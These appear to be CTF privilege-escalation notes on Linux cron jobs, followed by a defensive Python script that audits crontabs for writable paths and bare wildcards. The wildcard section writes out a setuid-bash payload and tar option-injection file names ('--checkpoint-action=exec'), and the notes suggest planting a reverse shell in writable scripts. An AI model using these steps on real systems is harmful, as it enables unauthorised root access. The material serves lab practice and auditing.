Cron jobs

Read the cron jobs, then check the permissions on any scripts they run

cat /etc/crontab

In CTF situations, if there are any custom scripts as cron jobs they're most likely there for a reason, especially ones running as root.

Systemd timers could also be running, which essentially do the same thing

systemctl list-timers --all

Cron Paths

If a cron job calls a script without its full file path, cron looks for it in the directories of the PATH variable, starting with the first one

Cron Wildcards

If we only have read permissions on a script but it is using a wildcard with another command, we can make that command run something malicious instead

With tar specifically we can make it run a script using touch and checkpoints

echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > privme.sh
touch -- "--checkpoint=1"
touch -- "--checkpoint-action=exec=sh privme.sh"

Cron File Overwrites

Check the file permissions on the scheduled script; if it is writable, add a reverse shell to it
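
The same three conditions can be checked from the defender's side. This is an added example, not part of the original notes: a Python audit of /etc/crontab-format text that reports commands resolved through PATH, bare wildcards passed to a command, and scripts or PATH directories that are group- or world-writable. The sample crontab, the function names and the finding labels are constructed for illustration.

```python
import os, re, shlex, stat
# Constructed sample in /etc/crontab format: five time fields, user, command.
SAMPLE = """\
PATH=/home/user:/usr/local/sbin:/usr/sbin:/usr/bin:/sbin:/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root backup.sh
*/10 * * * * root cd /var/www && tar czf /backups/www.tgz *
0 3 * * * root cd /var/log/app && tar czf /backups/logs.tgz -- ./*
"""
BUILTINS = {"cd", "test", "[", "export", "umask"}  # not looked up in PATH

def loosely_writable(path):
    """True if path exists and is group- or world-writable (ownership not checked)."""
    mode = os.stat(path).st_mode if os.path.exists(path) else 0
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text):
    """Return (line_no, kind, detail) findings for system-crontab text."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if re.match(r"PATH\s*=", line):
            for d in line.split("=", 1)[1].strip().strip('"').split(":"):
                if loosely_writable(d):
                    findings.append((no, "writable-path-dir", d))
        want = 3 if line.startswith("@") else 7  # @reboot-style vs five time fields
        parts = line.split(None, want - 1)
        if line.startswith("#") or re.match(r"\w+\s*=", line) or len(parts) < want:
            continue  # comment, environment assignment, blank or malformed line
        for seg in filter(str.strip, re.split(r"&&|\|\||[;|]", parts[-1])):
            try:
                words = shlex.split(seg, posix=False)  # keeps quotes on tokens
            except ValueError:
                continue  # unbalanced quotes: review this line by hand
            prog, guarded = words[0], False
            if prog.startswith("/"):
                if loosely_writable(prog):
                    findings.append((no, "writable-script", prog))
            elif prog not in BUILTINS:
                findings.append((no, "relative-command", prog))  # resolved via PATH
            for arg in words[1:]:
                guarded = guarded or arg == "--"
                # ./* or /dir/* cannot expand to option-like names; quoted * is literal
                if "*" in arg and arg[0] not in "'\"/." and not guarded:
                    findings.append((no, "bare-wildcard", f"{prog} ... {arg}"))
    return findings

if __name__ == "__main__":
    print(*audit_crontab(SAMPLE), sep="\n")
```

A `relative-command` finding matters only when a directory earlier in the crontab's PATH is writable by an unprivileged user, so read it together with `writable-path-dir`.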
